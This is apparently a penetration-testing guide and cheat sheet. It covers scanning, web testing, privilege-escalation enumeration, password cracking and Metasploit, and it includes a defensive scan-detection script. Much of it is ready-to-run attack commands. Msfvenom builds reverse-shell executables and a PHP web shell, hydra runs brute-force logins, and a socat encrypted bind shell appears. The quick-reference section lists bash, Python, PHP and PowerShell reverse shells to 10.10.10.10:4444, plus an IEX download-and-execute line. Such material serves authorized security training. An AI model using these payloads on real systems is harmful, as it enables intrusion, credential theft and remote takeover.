A comprehensive guide to penetration testing tools, methodologies, and practical security testing approaches.
- Testing Methodologies
- Network Tools
- Web Application Tools
- System Tools
- Password & Credential Tools
- Post-Exploitation Frameworks
- Penetration Testing Workflow
- Report Writing Guidelines
- Quick Reference & Cheat Sheets
Testing Methodologies
Industry Standards
- PTES (Penetration Testing Execution Standard) - Comprehensive testing framework
- OWASP Testing Guide v4 - Web application security testing
- NIST SP 800-115 - Technical guide to information security testing
Testing Phases
- Planning - Gather customer goals and rules of engagement
- Discovery - Scanning and enumeration to identify vulnerabilities
- Attack - Confirm vulnerabilities through exploitation
- Reporting - Document findings, exploits, and recommendations
Network Tools
Network Discovery & Scanning
Nmap - Network Mapper
Primary network discovery and port scanning tool.
Host Discovery:
```bash
# ARP discovery (same subnet)
sudo nmap -PR -sn 192.168.1.0/24
# ICMP discovery variations
sudo nmap -PE -sn 10.10.68.220/24   # Echo request
sudo nmap -PP -sn 10.10.68.220/24   # Timestamp
sudo nmap -PM -sn 10.10.68.220/24   # Address mask
# TCP/UDP discovery
sudo nmap -PS -sn 10.10.68.220/24   # TCP SYN ping
sudo nmap -PA -sn 10.10.68.220/24   # TCP ACK ping
sudo nmap -PU -sn 10.10.68.220/24   # UDP ping
```
Port Scanning:
```bash
# Comprehensive scans
nmap -sS -sV -sC -O -A --version-all -Pn target.com
nmap -p- --min-rate=1000 -T4 target.com
nmap -sU --top-ports 1000 target.com
# Stealth scanning
nmap -sS -f -T2 -D RND:10 --source-port 53 target.com
# Service detection with NSE
nmap --script vuln,safe,discovery,version target.com
```
Advanced Scanning Techniques:
```bash
# Null scan
sudo nmap -sN target.com
# FIN scan
sudo nmap -sF target.com
# Xmas scan
sudo nmap -sX target.com
# ACK scan (firewall detection)
sudo nmap -sA target.com
# Window scan
sudo nmap -sW target.com
```
Masscan
High-speed port scanner for large networks.
```bash
masscan -p1-65535 192.168.1.0/24 --rate=10000 --open-only
```
Other Network Tools
- ARP-scan - Layer 2 discovery tool
- Netdiscover - Active/passive ARP reconnaissance
- Zmap - Internet-wide network scanner
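As an added defender-side example (not from the original guide), the Null, FIN, Xmas and ACK probes listed under Advanced Scanning Techniques each carry a distinctive TCP flag set, and the script below parses tcpdump-style text lines, classifies each packet's flags, and reports sources that hit many distinct ports with an abnormal combination. The sample lines, the threshold and the label names are constructed assumptions, not output from a real capture.

```python
import re
from collections import defaultdict

# tcpdump flag letters: S=SYN F=FIN P=PSH U=URG R=RST, '.'=ACK, 'none'=no flags set.
LINE_RE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)
# Flag sets sent by nmap -sN, -sF, -sX, -sA and -sS respectively.
SCAN_SIGNATURES = {
    frozenset(): "null",
    frozenset("F"): "fin",
    frozenset("FPU"): "xmas",
    frozenset("."): "ack",
    frozenset("S"): "syn",
}
# Bare ACK also occurs in normal traffic, so it only counts above the port threshold.
ABNORMAL = {"null", "fin", "xmas", "ack"}

def classify_flags(flags: str) -> str:
    """Map a tcpdump flag string such as 'FPU', 'none' or 'S.' to a label."""
    letters = frozenset() if flags == "none" else frozenset(flags)
    return SCAN_SIGNATURES.get(letters, "other")

def summarize(lines):
    """Return {src_ip: {label: set(dst_ports)}} for lines that parse as TCP."""
    seen = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            seen[m["src"]][classify_flags(m["flags"])].add(int(m["dport"]))
    return seen

def flag_scanners(lines, min_ports=5):
    """Sources probing >= min_ports distinct ports with an abnormal flag set."""
    out = {}
    for src, by_label in summarize(lines).items():
        for label in sorted(ABNORMAL & set(by_label)):
            if len(by_label[label]) >= min_ports:
                out.setdefault(src, []).append((label, len(by_label[label])))
    return out

SAMPLE = [  # constructed lines in tcpdump's text format, not a real capture
    f"IP 10.0.0.5.4000{i} > 10.0.0.9.{p}: Flags [FPU], win 1024, length 0"
    for i, p in enumerate((21, 22, 23, 25, 80))
] + [
    "IP 10.0.0.7.51000 > 10.0.0.9.443: Flags [S], seq 1, win 64240, length 0",
    "IP 10.0.0.7.51000 > 10.0.0.9.443: Flags [.], ack 1, win 502, length 0",
    "IP 10.0.0.8.33000 > 10.0.0.9.80: Flags [none], win 1024, length 0",
]
```

Running `flag_scanners(SAMPLE)` on the sample reports only 10.0.0.5 as an Xmas scanner; the single Null probe from 10.0.0.8 stays below the threshold and the SYN/ACK pair from 10.0.0.7 looks like an ordinary handshake.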
Traffic Analysis
Wireshark
GUI-based network protocol analyzer for deep packet inspection.
tcpdump
Command-line packet analyzer.
```bash
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap 'tcp port 80'
```
Network Utilities
Netcat - Network Swiss Army Knife
```bash
# Listen on port
nc -lvnp 4444
# Connect to port
nc target.com 4444
# Transfer file
nc -lvnp 4444 > file.txt      # Receiver
nc target.com 4444 < file.txt  # Sender
```
Socat - Advanced Network Relay
More advanced than netcat with encryption and forwarding capabilities.
```bash
# Simple TCP relay
socat TCP-LISTEN:8080,fork TCP:target.com:80
# Encrypted bind shell
socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0,fork EXEC:/bin/bash
```
Web Application Tools
Primary Testing Suites
Burp Suite
Comprehensive web application security testing platform.
Key Features:
- Proxy - Intercept and modify HTTP/HTTPS traffic
- Target - Site map and content discovery
- Repeater - Manual request manipulation
- Intruder - Automated attacks (bruteforce, fuzzing)
- Scanner - Automated vulnerability detection
- Decoder - Encode/decode data
- Comparer - Compare responses
Common Use Cases:
- SQL injection testing
- XSS payload testing
- Authentication bypass
- Session management testing
- CSRF token analysis
OWASP ZAP
Free alternative to Burp Suite with similar capabilities.
Specialized Web Tools
SQLMap
Automated SQL injection detection and exploitation.
```bash
# Basic scan
sqlmap -u "http://target.com/page.php?id=1"
# POST request
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test"
# Database enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables
sqlmap -u "http://target.com/page.php?id=1" -D dbname -T users --dump
```
Directory & Content Discovery
Gobuster
Fast directory/file brute forcer.
```bash
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt,js,bak
```
ffuf - Fast Web Fuzzer
```bash
# Directory fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://target.com/FUZZ -mc 200,204,301,302,307,401,403
# Virtual host discovery
ffuf -w subdomains.txt -u http://target.com -H "Host: FUZZ.target.com"
# Parameter fuzzing
ffuf -w params.txt -u http://target.com/page?FUZZ=test -mc 200
```
Dirb/Dirsearch
Alternative directory enumeration tools.
Web Vulnerability Scanners
Nikto
Web server vulnerability scanner.
```bash
nikto -h target.com -C all
```
WPScan
WordPress vulnerability scanner.
```bash
wpscan --url http://target.com --enumerate u,p,t,tt
```
System Tools
Windows Enumeration & Exploitation
winPEAS
Windows privilege escalation awesome script.
```cmd
winpeas.exe > output.txt
```
PowerUp.ps1
PowerShell script for common Windows privilege escalation vectors.
```powershell
# Bypass execution policy
powershell.exe -nop -exec bypass
# Import and run
Import-Module .\PowerUp.ps1
Invoke-AllChecks
```
Windows Manual Enumeration
```cmd
# User enumeration
whoami /priv
net users
net user username
qwinsta
net localgroup
# System information
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Search for passwords
findstr /si password *.txt *.xml *.ini
# Check patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Network connections
netstat -ano
# Scheduled tasks
schtasks /query /fo LIST /v
# Services
wmic service list brief
sc qc servicename
```
Linux Enumeration & Exploitation
LinPEAS
Linux privilege escalation awesome script.
```bash
./linpeas.sh > output.txt
```
LinEnum
Basic Linux enumeration script.
pspy
Monitor Linux processes without root permissions.
Linux Manual Enumeration
```bash
# System information
uname -a
cat /etc/os-release
# User information
id
whoami
groups
# Find SUID binaries
find / -perm -4000 2>/dev/null
# World-writable directories
find / -type d -perm -222 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron*
# Network connections
netstat -tulpn
ss -tulpn
```
Password & Credential Tools
Password Cracking
John the Ripper
CPU-based password cracker.
```bash
# Basic usage
john hashfile.txt
# With wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
# Show cracked passwords
john --show hashfile.txt
# Crack specific format
john --format=raw-md5 hashfile.txt
```
Hashcat
GPU-accelerated password cracker.
```bash
# MD5 hashes
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# NTLM hashes
hashcat -m 1000 -a 0 hash.txt wordlist.txt
# WPA2 handshake
hashcat -m 22000 hash.hc22000 wordlist.txt
```
Network Authentication Attacks
Hydra
Network authentication brute forcer.
```bash
# SSH brute force
hydra -L users.txt -P passwords.txt ssh://target.com
# HTTP POST form
hydra -l admin -P passwords.txt target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
# FTP
hydra -L users.txt -P passwords.txt ftp://target.com
```
Wordlist Generation
Crunch
Pattern-based wordlist generator.
```bash
# Generate 4-character passwords with lowercase letters
crunch 4 4 abcdefghijklmnopqrstuvwxyz -o wordlist.txt
# With pattern: the pattern must be as long as the min/max length,
# here a fixed "pass" prefix followed by four lowercase letters (@)
crunch 8 8 -t pass@@@@ -o wordlist.txt
```
CUPP - Common User Passwords Profiler
Generate wordlists based on target information.
```bash
python3 cupp.py -i   # Interactive mode
```
CeWL
Generate wordlists from websites.
```bash
cewl -d 2 -m 5 -w wordlist.txt http://target.com
```
Post-Exploitation Frameworks
Metasploit Framework
Basic Usage
```bash
# Start Metasploit
msfconsole
# Search for exploits
search apache
# Use exploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec
# Set options
show options
set RHOSTS target.com
set LHOST 10.10.10.10
# Run exploit
exploit
```
Meterpreter Commands
```bash
# System information
sysinfo
getuid
ps
# File operations
ls
download file.txt
upload payload.exe
# Privilege escalation
getsystem
use priv
# Post modules
run post/windows/gather/hashdump
```
Msfvenom - Payload Generator
```bash
# List payloads
msfvenom --list payloads
# Windows reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf > shell.elf
# PHP web shell
msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4444 -f raw > shell.php
```
Penetration Testing Workflow
1. Reconnaissance & Information Gathering
# Passive recon
- OSINT gathering
- Subdomain enumeration
- Certificate transparency logs
- Google dorking
# Active recon
- DNS enumeration
- Port scanning
- Service enumeration
2. Vulnerability Assessment
# Automated scanning
- Vulnerability scanners (Nessus, OpenVAS)
- Web application scanners
- Network vulnerability detection
# Manual testing
- Service-specific testing
- Business logic flaws
- Authentication bypass attempts
3. Exploitation
# Initial access
- Known vulnerabilities
- Password attacks
- Client-side attacks
- Social engineering
# Privilege escalation
- Local exploits
- Misconfigurations
- Credential reuse
4. Post-Exploitation
# Persistence
- Backdoors
- Scheduled tasks
- Service installation
# Lateral movement
- Network enumeration
- Credential harvesting
- Pivoting techniques
# Data exfiltration
- Identify sensitive data
- Package and compress
- Covert channels
Report Writing Guidelines
Report Structure
1. Executive Summary
- High-level overview of findings
- Business impact assessment
- Key recommendations
- Risk ratings summary
2. Technical Summary
- Vulnerability categories found
- Successful attack paths
- Failed attempts and limitations
- Testing methodology used
3. Detailed Findings
For each vulnerability:
- Title: Clear vulnerability name
- Severity: Critical/High/Medium/Low
- Description: Technical explanation
- Impact: Business impact
- Proof of Concept: Steps to reproduce
- Remediation: Specific fix recommendations
- References: CVEs, documentation
4. Appendices
- Tool outputs
- Screenshots
- Code snippets
- Raw data
Severity Ratings
- Critical: Complete system compromise, data breach
- High: Significant impact, partial compromise
- Medium: Limited impact, requires conditions
- Low: Minimal impact, informational
Best Practices
- Be factual and objective
- Include clear reproduction steps
- Provide actionable remediation
- Use screenshots and evidence
- Consider business context
- Follow responsible disclosure
Quick Reference & Cheat Sheets
Common Port Services
21 - FTP
22 - SSH
23 - Telnet
25 - SMTP
53 - DNS
80 - HTTP
110 - POP3
111 - RPCbind
139 - NetBIOS
143 - IMAP
161 - SNMP
443 - HTTPS
445 - SMB
1433 - MSSQL
1521 - Oracle
3306 - MySQL
3389 - RDP
5432 - PostgreSQL
5900 - VNC
5985 - WinRM HTTP
5986 - WinRM HTTPS
8080 - HTTP Alternate
Reverse Shell Commands
Bash
```bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
```
Python
```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```
PHP
```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"); ?>
```
PowerShell
```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
File Transfer Methods
Python HTTP Server
```bash
# Python 2
python -m SimpleHTTPServer 8000
# Python 3
python3 -m http.server 8000
```
SMB Server (Impacket)
```bash
impacket-smbserver share . -smb2support
```
Netcat
```bash
# Receiver
nc -lvnp 4444 > file.txt
# Sender
nc target.com 4444 < file.txt
```
PowerShell Download
```powershell
# Download file
Invoke-WebRequest -Uri http://10.10.10.10/file.exe -OutFile file.exe
# Execute in memory
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/script.ps1')
```
Useful Resources
This guide provides a foundation for security testing. Always ensure you have proper authorization before testing any systems. Stay updated with the latest tools and techniques as the security landscape evolves rapidly.